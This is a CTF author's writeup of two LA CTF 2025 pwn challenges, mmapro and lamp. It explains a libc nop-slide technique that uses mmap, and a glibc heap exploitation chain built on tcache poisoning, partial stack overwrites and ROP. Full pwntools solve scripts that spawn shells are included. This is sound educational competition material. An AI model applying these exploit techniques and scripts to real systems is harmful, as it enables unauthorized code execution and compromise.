LA CTF 2025 - Author Writeups

2025-02-09

Writeups of pwn/mmapro and pwn/lamp from LA CTF 2025.

overview

This year I wrote six challenges for LA CTF: lamp, mmapro, eepy, messenger, and library in the pwn category, and elfisyou in the rev category. My solutions can be found in the challenge archive, but I also decided to provide writeups for two of the challenges that I found particularly interesting.

mmapro

This challenge requires you to spawn a shell using a single mmap syscall. The program exits immediately after the call and gives you no control over the contents of the mapped memory. The technique for solving this seems fairly novel, so I’m going to coin it “mmap oriented programming”, or MOP for short, although it’s unlikely to be useful outside of contrived challenges like this one.

source


#include <unistd.h>
#include <sys/mman.h>

int main()
{
	long a[6] = {mmap};
	write(1, a, 8);
	read(0, a, sizeof(a));
	mmap(a[0], a[1], a[2], a[3], a[4], a[5]);
}

overview

The program is dynamically linked with glibc 2.37. We are given a libc address leak and must supply six 64-bit arguments to mmap. The program will exit immediately after, which involves calling various libc destructor functions.

In order to modify the subsequent execution of the program in any way, we must clobber a libc code mapping. With the MAP_FIXED flag, mmap will interpret its first argument as an absolute address and replace any existing mappings that overlap the new range. A fresh anonymous mapping is zero-filled, so this effectively lets us punch a single, contiguous hole of null bytes into libc’s code region. The position and length of this hole are limited to page granularity.
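As a minimal sketch of that page granularity, assuming 4 KiB pages: Linux rejects a MAP_FIXED address that isn’t page aligned and rounds the length up to whole pages, so the hole always spans whole pages. The helper `zero_hole` is hypothetical and only models those two rules.

```python
PAGE = 0x1000  # assumption: 4 KiB pages, the x86-64 default


def zero_hole(addr: int, length: int) -> tuple[int, int]:
    """Return the [start, end) range a MAP_FIXED anonymous mmap would zero.

    Models two Linux rules: a MAP_FIXED address must be page aligned, and
    the length is rounded up to a whole number of pages.
    """
    if addr % PAGE:
        raise ValueError("MAP_FIXED address must be page aligned (EINVAL)")
    if length <= 0:
        raise ValueError("length must be positive")
    pages = -(-length // PAGE)  # ceiling division
    return addr, addr + pages * PAGE


# Offsets relative to the libc base, matching the values used later on.
print([hex(x) for x in zero_hole(0x115000, 0x57000)])  # ['0x115000', '0x16c000']
print([hex(x) for x in zero_hole(0x115000, 0x56001)])  # same: the last page is zeroed whole
```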

This is an x86-64 binary, so the null byte pages will decode to the repeated instruction add byte ptr [rax], al, which is encoded as two null bytes. This is effectively a nop when rax points to writeable memory. If we start a mapping at some page in libc that is executed when rax is writeable, we can cause the program to nop slide through N pages, N being dependent on our length parameter, and it will continue executing at the start of some later code page.
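To make the slide concrete, here is a toy model (the helper `slide` is hypothetical) that only understands the `00 00` encoding. It also illustrates one subtlety worth keeping in mind: if the distance from the entry point to the end of the hole is odd, the final `00` opcode takes its ModRM byte from the landing page, so the landing page’s first bytes decode differently.

```python
def slide(code: bytes, entry: int) -> int:
    """Follow `00 00` pairs (add byte ptr [rax], al) starting at entry.

    Toy model: it knows this single encoding and returns the offset of the
    first instruction that is not a zero pair, i.e. where execution lands.
    """
    pc = entry
    while code[pc:pc + 2] == b"\x00\x00":
        pc += 2  # one add byte ptr [rax], al: does not fault while rax is writable
    return pc


hole = bytes(3 * 0x1000)        # three zeroed pages
landing = b"\x48\x89\xc7"       # mov rdi, rax: stand-in for real libc code
code = hole + landing

print(hex(slide(code, 0x100)))  # 0x3000: lands exactly on the landing page
print(hex(slide(code, 0x101)))  # 0x2fff: the last 00 opcode borrows 0x48 as its ModRM byte
```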

This “landing” page can be thought of as a gadget: it contains some unique instructions that may allow us to continue code execution, depending on how they use memory or registers that we control. The page boundary will slice most instructions in half, but thanks to x86’s variable-length encoding, the resulting byte sequences may still decode into something useful to us.

solution

There are 376 pages of code in this libc. We first have to find some valid starting pages, and for each one there are at most 375 different slide lengths leading into different gadgets. I wrote some scripts to extract these gadgets and began inspecting them manually, but this isn’t super feasible since they often depend on various conditionals and jumps. It would make sense to write a symbolic execution tool for this.
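A sketch of that search space, with pages numbered from 0 within libc’s 376-page code region (the helper `slide_candidates` and this numbering are hypothetical). It shows where the “at most 375” bound comes from: a hole must leave at least one later code page to land on.

```python
PAGE = 0x1000


def slide_candidates(text_pages: int, start_page: int):
    """Yield (length, landing_page) for each hole that begins at start_page.

    Pages are numbered 0..text_pages-1 inside libc's code region. A hole of
    n pages must leave at least one code page after it to land on.
    """
    for n in range(1, text_pages - start_page):
        yield n * PAGE, start_page + n


cands = list(slide_candidates(376, 0))
print(len(cands))           # 375, the most any single starting page offers
print(cands[0], cands[-1])  # (4096, 1) (1536000, 375)
```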

There are multiple starting pages that work with a writeable rax, but the most useful one is the page containing the code for the libc mmap function itself, since we control six registers at that point. rax will hold the syscall return value, which is the address of the page we mapped, and we can ensure it’s writeable because we control the protection parameter. I wrote a gdb script that tests each slide length from this starting page offset of 0x115000 and logs the register contents to a file on each segfault. I found that with a length of 0x57000 we could control rip. This is because our parameters are saved on the stack, and the gadget eventually returns to those values after calling ioctl.

There are unfortunately a few restrictions on the parameters that we must comply with to ensure the mmap succeeds. By bruteforcing, I found that every bit set in the flags parameter must also be set in the mask 0xffffffffffebfff2, and the mapping must be at least writeable and executable, so the prot parameter needs its 0x2 (PROT_WRITE) and 0x4 (PROT_EXEC) bits set. Additionally, the last parameter, offset, must be page aligned.
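The constraints above can be restated as a check. This is a sketch: `mmap_args_ok` is a hypothetical helper, FLAGS_MASK is the author’s empirically found mask rather than anything taken from the kernel, and the example bases are made up. It also shows why the flags value depends on ASLR: adding a page-aligned base to the gadget offset can carry a forbidden bit into the address.

```python
PAGE = 0x1000
PROT_WRITE = 0x2
PROT_EXEC = 0x4
FLAGS_MASK = 0xFFFFFFFFFFEBFFF2  # found by bruteforcing, per the writeup


def mmap_args_ok(prot: int, flags: int, offset: int) -> bool:
    """Restate the three constraints on prot, flags and offset."""
    flags_ok = (flags & ~FLAGS_MASK) == 0  # every set bit must also be in the mask
    need = PROT_WRITE | PROT_EXEC
    prot_ok = (prot & need) == need
    offset_ok = offset % PAGE == 0
    return flags_ok and prot_ok and offset_ok


# flags is the ret gadget at libc offset 0xbda72, so the base decides the outcome.
print(mmap_args_ok(7, 0x7F0000000000 + 0xBDA72, 0x115000))  # True
print(mmap_args_ok(7, 0x7F0000010000 + 0xBDA72, 0x115000))  # False: carries in bit 0x40000
```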

The gadget at offset 0x57000 returns to our parameters on the stack, starting with flags, followed by fd and offset. fd is completely controllable, so I set it to the address of gets, and I set flags to a single ret gadget that complies with the mask (whether it does is slightly dependent on ASLR). rdi will be set to the address we mapped, meaning the gets call will write code to our region. After the gets call, we return to our offset parameter, which we set to the start of the page that gets wrote to; since that address is page aligned, it also satisfies the alignment check. We can then send shellcode to gets.

The solution thus boils down to:

mmap(libc.address+0x115000, 0x57000, 7, libc.address+0xbda72, libc.sym.gets, libc.address+0x115000)
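The same call expressed as the raw bytes the program reads: `long a[6]` is filled by `read(0, a, sizeof(a))`, so the payload is six little-endian 8-byte values, which is what the solve script’s `mmap` helper sends with `p64`. This sketch uses only `struct`; the `gets_addr` parameter stands in for `libc.sym.gets`, and the addresses in the usage lines are made up. Because libc’s base is page aligned, the low 12 bits of the flags value are always 0xa72, which includes MAP_PRIVATE (0x2), MAP_FIXED (0x10) and MAP_ANONYMOUS (0x20) on Linux, so the mapping is anonymous and zero-filled and the kernel ignores the fd value.

```python
import struct


def mmapro_payload(libc_base: int, gets_addr: int) -> bytes:
    """Pack the six mmap arguments in the layout main() reads into long a[6]."""
    args = (
        libc_base + 0x115000,  # addr: mmap's own code page, replaced via MAP_FIXED
        0x57000,               # length: slide distance to the useful landing page
        7,                     # prot: PROT_READ | PROT_WRITE | PROT_EXEC
        libc_base + 0xBDA72,   # flags: also the ret gadget on the return path
        gets_addr,             # fd: ignored for an anonymous map, later returned into
        libc_base + 0x115000,  # offset: page aligned, and where the shellcode lands
    )
    return struct.pack("<6Q", *args)


# Made-up addresses, for illustration only.
payload = mmapro_payload(0x7F0000000000, 0x7F0000080000)
print(len(payload))                                   # 48
print(hex(struct.unpack("<6Q", payload)[3] & 0xFFF))  # 0xa72
```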

I will note that it took me testing slides on multiple different libcs before I found one that had a working gadget. My full solve script is provided below.

#!/usr/bin/env python3

from pwn import *

exe = ELF("./mmapro_patched")
libc = ELF("./libc.so.6")

serv = "chall.lac.tf"
port = 31179

context.binary = exe

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process([exe.path])
    return r

r = conn()

def mmap(a, b, c, d, e, f):
    r.send(p64(a)+p64(b)+p64(c)+p64(d)+p64(e)+p64(f))

def main():
    global r
    for i in range(0x10):
        log.info(f"{i}")
        libc.address = u64(r.recv(8))-0x115f20
        log.info(f"{hex(libc.address)=}")
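        mask = 0xffffffffffebfff2  # every set bit of flags must also be set here
        flags = libc.address+0xbda72  # a ret gadget that doubles as the flags argument
        if (flags & ~mask) != 0:
            # ASLR carried a forbidden bit into the gadget address, so reconnect
            print("unlucky with mask")
            r.close()
            r = conn()
            continue
        # zero 0x57 pages starting at mmap's own code page; the slide then
        # returns through flags (ret) -> fd (gets) -> offset (our RWX page)
        mmap(libc.address+0x115000, 0x57000, 7, flags, libc.sym.gets, libc.address+0x115000)
        sleep(0.2)
        # gets writes to rdi (the mapped page), so this is the code we return into
        r.sendline(asm(shellcraft.sh()))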
        r.interactive()
        exit()

if __name__ == "__main__":
    main()

lamp

This is an arbitrary heap overflow challenge on glibc 2.39 with no file streams in use and an infinite program loop. We are initially given a heap leak, and allocations are restricted to a max size of 0xff. Input is also taken through a custom gets function that doesn’t null terminate, allowing partial overwrites. There is an amazing writeup of this challenge by Jonathan Keller. It provides a much more detailed description of the solve path than my brief overview here, so I highly recommend checking it out. The source for the challenge is provided below.

source

#include <stdlib.h>
#include <unistd.h>

void gets(char *p) {
	char c;
	for(;;) {
		c = *p;
		read(0, p, 1);
		if(*p == '\n') {
			*p = c;
			break;
		}
		p++;
	}
}

int main() {
	char *leek = malloc(0x18);
	free(leek);
	write(1, leek, 8);
	char buf[3] = {};
	for(;;) {
		write(1, ">", 1);
		read(0, buf, 2);
		gets(malloc(strtol(buf, 0, 0x10)));
	}
}
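A small Python model of the challenge’s gets (the helper `lamp_gets` is hypothetical, with a bytearray standing in for memory) shows why it allows partial overwrites: the newline’s slot gets its old byte back, and no null terminator is ever written. The model raises EOFError when input runs out, whereas the real loop just keeps calling read.

```python
def lamp_gets(mem: bytearray, p: int, data: bytes) -> int:
    """Model of the challenge's gets(); returns the index of the newline slot.

    Each byte is stored before it is checked. When the newline arrives, the
    byte it overwrote is put back, so no terminator is ever written.
    """
    for b in data:
        c = mem[p]       # remember the byte we are about to clobber
        mem[p] = b       # read(0, p, 1)
        if b == 0x0A:    # '\n': restore and stop
            mem[p] = c
            return p
        p += 1
    raise EOFError("input ended before a newline (the real loop keeps reading)")


# A pointer-sized value already in memory: overwrite only its lowest byte.
mem = bytearray(b"\x11\x22\x33\x44\x55\x66\x77\x7f")
lamp_gets(mem, 0, b"\xa0\n")
print(mem.hex())  # a02233445566777f
```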

solution

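We first set up a repeatable sysmalloc free primitive to obtain free chunks of sizes up to 0xe0. The helper forges the top chunk’s size as the requested size plus 0x20 (capped at 0x100), and the next allocation that doesn’t fit makes sysmalloc free the old top.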

def free(sz):
    sz += 0x20
    if sz > 0x100:
        log.error("unsupported free size")
        exit(1)
    rem = (0x100-sz)//0x10
    for i in range(13):
        if rem > 0:
            add(0xff)
            rem -= 1
        else:
            add(0xf8)
    add(0xf8, b"A"*0xf8 + p64(sz|1))
    add(0xf8)
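Our reading of the padding in free(), as a sketch: sysmalloc shrinks the old top by 0x20 to make room for fenceposts before freeing it, so forging the size as sz + 0x20 yields a freed chunk of exactly sz, and sysmalloc also asserts that the old top ends on a page boundary. The fillers are chosen so that the bytes allocated plus the forged size always total 0xf00, so the forged top always ends at the same offset from where the sequence began. `chunk_size` and `free_plan` are hypothetical helpers that mirror the script without talking to the process.

```python
def chunk_size(req: int) -> int:
    """glibc's request2size on x86-64: add 8 for the size field, align to 16, min 0x20."""
    return max(0x20, (req + 0x8 + 0xF) & ~0xF)


def free_plan(sz: int) -> tuple[list[int], int]:
    """Mirror the solve script's free(sz): (malloc requests before the trigger, forged top size)."""
    top = sz + 0x20  # sysmalloc trims 0x20 for fenceposts, so the freed chunk is sz
    if top > 0x100:
        raise ValueError("unsupported free size")
    rem = (0x100 - top) // 0x10
    fillers = [0xFF] * rem + [0xF8] * (13 - rem)  # 0x110 and 0x100 byte chunks
    return fillers + [0xF8], top  # the last request overflows into the top chunk's size


for sz in (0x20, 0xA0, 0xE0):
    reqs, top = free_plan(sz)
    used = sum(chunk_size(r) for r in reqs)
    print(hex(sz), hex(top), hex(used + top))  # used + top is 0xf00 every time
```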

We can build an arbitrary write primitive by overflowing into freed tcache chunks, a technique described here. There are no file streams and our program never exits, so we’ll need to target the stack to hijack control flow. The run binary that accompanies the challenge execves lamp with a particular argv and envp, which hints at the next step.
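Since glibc 2.32, tcache next pointers are protected by safe-linking: the stored value is (pos >> 12) ^ ptr, where pos is the address of the fd field itself. That is what the solve script’s `mangle(ptr, pos)` computes, and it is why the heap leak is needed to poison an fd. A minimal sketch; `poison_fd` is a hypothetical helper and the addresses are made up. glibc also refuses tcache entries that aren’t 16-byte aligned, which the sketch checks.

```python
def mangle(ptr: int, pos: int) -> int:
    """glibc safe-linking (PROTECT_PTR): pos is the address of the fd field itself."""
    return (pos >> 12) ^ ptr


def demangle(stored: int, pos: int) -> int:
    """REVEAL_PTR is the same XOR with the same key, so it undoes mangle()."""
    return (pos >> 12) ^ stored


def poison_fd(target: int, fd_addr: int) -> int:
    """Hypothetical helper: the fd value to overflow into a freed tcache chunk
    at fd_addr so that a later malloc of that size returns target."""
    if target % 0x10:
        # tcache_get aborts with "malloc(): unaligned tcache chunk detected"
        raise ValueError("tcache targets must be 16-byte aligned")
    return mangle(target, fd_addr)


heap_fd = 0x5555555592A0   # made-up address of the overflowed chunk's fd field
target = 0x7FFFFFFFE000    # made-up 16-byte aligned destination
stored = poison_fd(target, heap_fd)
print(hex(demangle(stored, heap_fd)))  # 0x7fffffffe000
```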

We fill up the tcache to get smallbin chunks and partially overwrite the libc arena list pointer to link in a chunk around __libc_argv. The run binary ensures that there are enough environment variables, which places pointers at the offsets needed to make this region a valid chunk for unlinking. This part requires a 4-bit bruteforce for the libc partial overwrite, and it’s the only bruteforce we’ll need.
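Where the 4 bits come from, as a sketch: libc’s base is page aligned, so a 2-byte partial overwrite fixes bits 0 to 15 of a libc pointer, of which bits 0 to 11 are known and bits 12 to 15 are random. The target offset below is hypothetical (only its low 12 bits matter); the retry count matches the 0x20 attempts in the solve script’s main().

```python
def hits(libc_base: int, target_off: int, guess_low16: int) -> bool:
    """Does writing guess_low16 over a libc pointer's low 2 bytes reach libc_base + target_off?"""
    return (libc_base + target_off) & 0xFFFF == guess_low16


def success_rate(target_off: int, guess_low16: int) -> float:
    # libc's base is page aligned, so within the low 2 bytes only bits 12..15 vary
    wins = sum(hits(nibble << 12, target_off, guess_low16) for nibble in range(16))
    return wins / 16


rate = success_rate(0x2046E0, 0x46E0)  # hypothetical target offset and guess
attempts = 0x20                         # main() retries up to 0x20 connections
print(rate)                                  # 0.0625
print(f"{1 - (1 - rate) ** attempts:.3f}")   # 0.873
```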

When we allocate from the smallbin after forging the entry, glibc performs tcache stashing. We place enough smallbin entries ahead of it that the __libc_argv chunk is the last chunk that fits into the tcache, given its maximum of 7 entries. This both prevents corruption and places it as a raw pointer in the heap through the tcache_perthread_struct (TPS).
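A toy model of the stashing order, with hypothetical chunk names standing in for addresses. It only tracks list order: in real glibc, each stashed chunk’s bk target also receives a `bck->fd = bin` write, so the forged chunk’s bk must point at writable memory, and the model skips the integrity check glibc applies to the victim itself.

```python
TCACHE_COUNT = 7  # glibc's default per-size tcache limit (mp_.tcache_count)


def stash(bin_from_tail: list[str], tcache: list[str]) -> list[str]:
    """Toy model of the smallbin -> tcache stash in _int_malloc.

    bin_from_tail lists chunks in the order glibc takes them: last(bin), then
    each chunk's bk. The first entry is the victim returned to the caller;
    the rest move into the tcache (pushed at the head) until it is full.
    Returns the chunks the stash loop never takes.
    """
    _victim, *rest = bin_from_tail
    while len(tcache) < TCACHE_COUNT and rest:
        tcache.insert(0, rest.pop(0))  # tcache_put links the chunk in at the head
    return rest


chain = ["victim", "c1", "c2", "c3", "c4", "c5", "c6", "argv_chunk", "beyond"]
tcache: list[str] = []
left = stash(chain, tcache)
print(tcache[0])  # argv_chunk
print(left)       # ['beyond']
```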

We use our arbitrary write to overwrite the low 2 bytes of the stack address stored in the TPS with zeros. This yields a valid address that’s guaranteed to be below our current position on the stack. Given our infinite overflow, we can keep sending bytes up the stack until we reach the return address of read, partially overwriting it with the byte 0xa0 to loop main through _start. To detect the loop, we send a single probe byte, wait for a prompt with a short recv timeout, and then send the next 15 bytes. By keeping track of the number of bytes we had to send before the loop triggered, we can calculate the low bytes of the stack for future overwrites.
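Our reading of why one probe per 16 bytes is enough: under the System V x86-64 ABI, rsp is 16-byte aligned just before a call, so a return address sits at an address that is 8 mod 16, and with the low 16 bits zeroed every probe byte lands on exactly such an address. Since read’s frame is the innermost one, its return address is the first live value the sweep reaches. The sketch below simulates the bookkeeping with a hypothetical slot value; it is not the exploit itself.

```python
from typing import Optional


def sweep(slot_low16: int, partial: int = 0) -> Optional[int]:
    """Simulate the solve's stack sweep; return the recovered low 16 bits.

    slot_low16: hypothetical low 16 bits of the slot holding read's return
    address. Writing starts at `partial` (0 in the solve), 8 filler bytes go
    first, then each round sends one probe byte (followed by a receive
    timeout) and 15 more filler bytes, like the script's loop.
    """
    diff = partial + 8  # offset of the next probe byte; the script's `diff`
    for _ in range(0x10000 // 16):
        if diff == slot_low16:
            return diff  # read returns into _start, so a '>' prompt shows up
        if diff < slot_low16 < diff + 16:
            raise ValueError("a filler byte would hit the slot and the count would be off")
        diff += 0x10
    return None


print(hex(sweep(0x1238)))  # 0x1238
```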

We want a stack leak when main loops in order to set up ROP later, so before beginning this process, we duplicate a mangled __libc_argv pointer into the 0x20 TPS entry. This is achieved by corrupting an fd to point to a chunk whose first qword is the stack pointer, which glibc mangles when it places it into the TPS as the previous chunk is allocated. When we loop main, it will allocate a 0x20 chunk and free it, mangling the already mangled stack TPS entry again and placing it in the chunk’s first qword, which is leaked to us. Because the mangling happens twice, we end up with a normal stack pointer for our leak, although a mangled leak wouldn’t have been an issue anyway, since the heap leak would let us demangle it.
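Why mangling twice gives back a clean pointer, as a sketch: each mangle XORs in the key pos >> 12, so the two keys cancel when both positions lie in the same 4 KiB page. That condition is our reading of the layout, and all addresses below are made up. If the pages differed, the leak would be off by the XOR of the two keys, which the heap leak would still let us undo.

```python
def mangle(ptr: int, pos: int) -> int:
    """glibc safe-linking XOR, same as the solve script's mangle()."""
    return (pos >> 12) ^ ptr


stack_ptr = 0x7FFFFFFFE3A8   # made-up stack pointer like the one in __libc_argv
pos_first = 0x5555555590D0   # made-up positions, both in the page 0x555555559000
pos_second = 0x5555555592A0

once = mangle(stack_ptr, pos_first)   # the value sitting in the 0x20 TPS entry
twice = mangle(once, pos_second)      # what the free in main stores and write() leaks
print(hex(twice))                     # 0x7fffffffe3a8: the keys cancel
```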

Now we have a full stack leak by combining our calculated byte count with the address leak. We repeat this general process for a libc leak, and finally allocate a chunk on the stack to hold our ROP chain. We then send part of our ROP chain through the strtol input buffer and partially overwrite read’s return address with 0xf8 so that it returns to a ret gadget. This initiates our ROP chain and spawns a shell.

I think the idea of starting with a low stack address to both avoid bruteforce and calculate a leak was pretty cool. My full solve script with comments is provided below.

#!/usr/bin/env python3

from pwn import *
from tqdm import tqdm

exe = ELF("./lamp")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

serv = "chall.lac.tf"
port = 31169

context.binary = exe
context.aslr = False

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process(["./run"])
        if args.GDB:
            gdb.attach(r, gdbscript="""
                base
                #b *0x7ffff7cabe87
            """)
    return r

r = None
    
def mangle(ptr, pos):
    return (pos >> 12) ^ ptr

def flush():
    global cnt
    r.recvuntil(b">"*cnt)
    cnt = 0

def add(sz, data=b"A"):
    global cnt
    r.send(f"{sz:x}".encode())
    r.sendline(data)
    cnt += 1

def free(sz):
    sz += 0x20
    if sz > 0x100:
        log.error("unsupported free size")
        exit(1)
    rem = (0x100-sz)//0x10
    for i in range(13):
        if rem > 0:
            add(0xff)
            rem -= 1
        else:
            add(0xf8)
    add(0xf8, b"A"*0xf8 + p64(sz|1))
    add(0xf8)

def shoot():
    global r, cnt, heap
    cnt = 1
    heap = u64(r.recv(8))<<12
    log.info(f"{hex(heap)=}")
    # set up predictable top chunk for free primtive
    for _ in range(11):
        add(0xff)
    add(0xff, b"A"*0x108 + p64(0x91))
    add(0xf8)
    # partial overwrite smallbin arena pointers to forge
    # entry with stack address, will be put
    # into tcache after tcache stashing
    sz = 0xa0
    for _ in range(11):
        free(sz)
    free(0x20)
    free(sz)
    for _ in range(7):
        free(sz+0x10)
    free(0x20)
    free(sz+0x10)
    free(sz+0x10)
    #off = 0xf6e0
    off = 0x46e0
    add(0x18, b"A"*0x21f68+p64(sz+0x10|1)+p64(heap+0x1b9f40)+p16(off-0x18))
    add(0x18, b"A"*0x21f78+p64(sz|1)+p64(heap+0x175f40)+p64(heap+0x2ebf30))
    for _ in range(7):
        add(sz-8)
    add(sz-8)
    # partial overwrite stack address in TPS with zeros
    # so it's definitely below return address of read
    sz += 0x20
    free(sz)
    free(0x20)
    free(sz)
    add(0x18, b"A"*0x21f58+p64(sz|1)+p64(mangle(heap+0xc0, heap+0x373f20)))
    add(sz-8)
    partial = 0
    add(sz-8, p64(0)*2+p16(partial))
    # set up 0x20 to have stack fd for leaking later
    add(0x18)
    free(0x20)
    free(0x30)
    free(0x20)
    add(0x28, b"A"*0x22008+p64(0x21)+p64(mangle(heap+0xd0, heap+0x3d9fc0)))
    add(0x18)
    add(0x18, b"\x00")
    for _ in range(8):
        free(0x90)
    # gradually send bytes into stack,
    # will loop main once we overwrite low byte of
    # read's return, keep track of number of bytes sent for leak
    flush()
    leak = b""
    r.send(b"98")
    r.send(p8(0xa0)*8)
    diff = 8 + partial
    for _ in tqdm(range(0x10000//16)):
        r.send(p8(0xa0))
        leak = r.recvuntil(b">", timeout=0.05)
        if leak != b"":
            break
        r.send(p8(0xa0)*15)
        diff += 0x10
    stack = (u64(leak[:8])&(~0xffff))+diff-0x150
    log.info(f"{hex(stack)=}")
    # leak libc with tcache poisoning on stack to loop main
    free(0x40)
    free(0x20)
    add(0x38, p64(0x431)*(0x22018//8)+p64(0x21)+p64(mangle(heap+0x52bfc0, heap+0x52dfc0)))
    add(0x18)
    free(0x30)
    free(0x40)
    free(0x30)
    add(0x38, b"A"*0x22008+p64(0x31)+p64(mangle(stack-0x18, heap+0x593fb0)))
    add(0x28)
    flush()
    add(0x28, p64(0)*3+p8(0xa0))
    stack -= 0x150
    libc.address = u64(r.recv(8))-0x203b20
    log.info(f"{hex(libc.address)=}")
    # set up rop chain, requires sending
    # payload into the strtol input buffer.
    # will return 0 when conversion is bad so we poison 0x20
    add(0xff)
    add(0xff)
    add(0xff)
    add(0xff)
    add(0xf8)
    free(0x30)
    free(0x40)
    free(0x30)
    add(0x38, b"A"*0x22008 + p64(0x31) + p64(mangle(stack+8, heap+0x5f9fb0)))
    add(0x28)
    poprdi = libc.address+0x10f75b
    poprsi = libc.address+0x2b46b
    poprax = libc.address+0xdd237
    xorrdx = libc.address+0xa0d6f
    rop = p64(poprdi)+p64(next(libc.search(b"/bin/sh\x00")))
    rop += p64(poprsi)+p64(0)*2+p64(poprax)+p64(0x3b)+p64(xorrdx)
    add(0x28, rop)
    free(0x20)
    free(0x30)
    free(0x20)
    add(0x28, b"A"*0x22008+p64(0x21)+p64(mangle(stack-0x18, heap+0x65ffc0)))
    add(0x18)
    r.send(p16((poprdi>>40)&0xffff))
    r.sendline(p64(0)*3+p8(0xf8))
    r.interactive()

def main():
    global r
    done = False
    # 4 bit bruteforce
    for i in range(0x20):
        r = conn()
        log.info(f"attempt {i}")
        try:
            shoot()
            done = True
        except:
            r.close()
            pass
        if done:
            break

if __name__ == "__main__":
    main()